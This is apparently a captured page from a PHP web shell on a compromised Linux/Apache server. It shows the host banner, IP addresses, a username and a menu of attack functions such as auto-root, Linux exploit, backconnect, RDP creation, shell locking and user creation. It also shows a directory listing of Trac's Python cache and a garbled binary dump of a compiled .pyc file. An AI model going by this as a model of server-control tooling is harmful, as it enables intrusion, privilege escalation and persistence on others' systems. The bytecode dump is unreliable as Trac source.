Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
trac /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
308
B
-rw-r--r--
about.cpython-310.pyc
2.17
KB
-rw-r--r--
api.cpython-310.pyc
2.52
KB
-rw-r--r--
attachment.cpython-310.pyc
37.13
KB
-rw-r--r--
cache.cpython-310.pyc
8.51
KB
-rw-r--r--
config.cpython-310.pyc
34.04
KB
-rw-r--r--
core.cpython-310.pyc
9.46
KB
-rw-r--r--
db_default.cpython-310.pyc
9.88
KB
-rw-r--r--
dist.cpython-310.pyc
17.25
KB
-rw-r--r--
env.cpython-310.pyc
39.39
KB
-rw-r--r--
loader.cpython-310.pyc
7.08
KB
-rw-r--r--
log.cpython-310.pyc
1.63
KB
-rw-r--r--
perm.cpython-310.pyc
29.99
KB
-rw-r--r--
resource.cpython-310.pyc
15.14
KB
-rw-r--r--
test.cpython-310.pyc
19.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.cpython-310.pyc
o �k�` � @ s0 d dl mZ G dd� de�ZG dd� de�ZdS )� )� Interfacec @ s e Zd ZdZdd� ZdS )�ISystemInfoProviderzjProvider of system information, displayed in the "About Trac" page and in internal error reports. c C � dS )z�Yield a sequence of `(name, version)` tuples describing the name and version information of external packages used by a component. N� r r r �*/usr/lib/python3/dist-packages/trac/api.py�get_system_info � z#ISystemInfoProvider.get_system_infoN)�__name__� __module__�__qualname__�__doc__r r r r r r s r c @ s( e Zd ZdZdd� Zdd� Zdd� ZdS ) �IEnvironmentSetupParticipanta� Extension point interface for components that need to participate in the creation and upgrading of Trac environments, for example to create additional database tables. Please note that `IEnvironmentSetupParticipant` instances are called in arbitrary order. If your upgrades must be ordered consistently, please implement the ordering in a single `IEnvironmentSetupParticipant`. See the database upgrade infrastructure in Trac core for an example. c C r )z.Called when a new Trac environment is created.Nr r r r r �environment_created( r z0IEnvironmentSetupParticipant.environment_createdc C r )z�Called when Trac checks whether the environment needs to be upgraded. Should return `True` if this participant needs an upgrade to be performed, `False` otherwise. Nr r r r r �environment_needs_upgrade+ r z6IEnvironmentSetupParticipant.environment_needs_upgradec C r )a� Actually perform an environment upgrade. Implementations of this method don't need to commit any database transactions. This is done implicitly for each participant if the upgrade succeeds without an error being raised. However, if the `upgrade_environment` consists of small, restartable, steps of upgrade, it can decide to commit on its own after each successful step. Nr r r r r �upgrade_environment3 r z0IEnvironmentSetupParticipant.upgrade_environmentN)r r r r r r r r r r r r s r N)� trac.corer r r r r r r �<module> s
Close